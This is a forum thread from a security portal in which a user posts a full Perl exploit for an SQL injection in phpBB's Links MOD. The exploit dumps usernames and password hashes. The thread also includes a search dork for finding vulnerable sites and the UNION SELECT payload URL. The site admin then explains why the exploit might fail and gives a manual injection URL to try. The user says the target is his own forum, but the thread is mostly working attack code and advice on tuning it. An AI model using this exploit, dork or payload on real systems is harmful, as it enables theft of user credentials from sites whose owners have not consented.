Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 21, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 199
Members: 0
Total: 199
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Doesn't work for me
Post new topic  Reply to topic View previous topic :: View next topic 
Doesn't work for me
PostPosted: Wed Nov 21, 2007 4:15 pm Reply with quote
astropi
Regular user
Regular user
 
Joined: Nov 21, 2007
Posts: 20




Hi everybody, i have founded an exploit from warex.us and i wanted to try it in my forum to see if i suck in security Shocked (i do suck).

Do you remember this perl code:
Code:
#!/usr/bin/perl

print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
   or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2007-08-31]


Well i have followed all the steps but at the end, i have the sm eproblem as diegocure15 that have posted into this thread: http://www.waraxe.us/modules.php?name=Forums&file=viewtopic&t=1916 .

I am kinda new to those things so i will look like a newb( i am Smile ). I have tried the url that warex gived in the same thread but it didn't work..

The phpbb forum is really mine and if admins want proof i can send them via pm.

Thank you.
View user's profile Send private message
PostPosted: Thu Nov 22, 2007 4:47 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Screenshot of the errors in studio pls.
View user's profile Send private message
PostPosted: Sat Nov 24, 2007 6:13 pm Reply with quote
astropi
Regular user
Regular user
 
Joined: Nov 21, 2007
Posts: 20




Well there isn't any error, the only problem is that the md5 hash don't appear. It just say "exploit finished". After, when i do log myself from the account that i have specialy created to try this, nothing have happened. I have did it from my computer.

By the way, here is a screenshot that i have made, hoping that this will help you: http://img112.imageshack.us/img112/1646/commanduy7.gif .

Thank you very much.


Last edited by astropi on Sat Nov 24, 2007 6:51 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Sat Nov 24, 2007 6:41 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




There can be many reasons:

1. security hole is pacthed
2. mysql version is < 4.x, so no UNION support
3. and finally - sql prefix can be different from default "phpbb_" - this is very common in real world phpbb installations!

So what I can suggest - try sql injection manually and if you are lucky, then phpbb will show nice error message and you will find out the reason, why exploit is not working.

I suggest to try something like this:

http://www.target.com/links.php?t=search&search_keywords=asd&start=1,1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*

Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Nov 24, 2007 6:54 pm Reply with quote
astropi
Regular user
Regular user
 
Joined: Nov 21, 2007
Posts: 20




waraxe wrote:
There can be many reasons:

I suggest to try something like this:

http://www.target.com/links.php?t=search&search_keywords=asd&start=1,1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*

Smile


I have already tryed this but it's showed me what browser i am using and what is my Ip, hopefully it's my own website. Thank you very much Waraxe, don't forget to look at my screenshot if you have any time: http://img112.imageshack.us/img112/1646/commanduy7.gif
View user's profile Send private message
PostPosted: Sat Nov 24, 2007 8:53 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




PM me url to that phpbb installation and i can take a quick look Smile
View user's profile Send private message Send e-mail Visit poster's website
Doesn't work for me
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Book Opinions
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.079 Seconds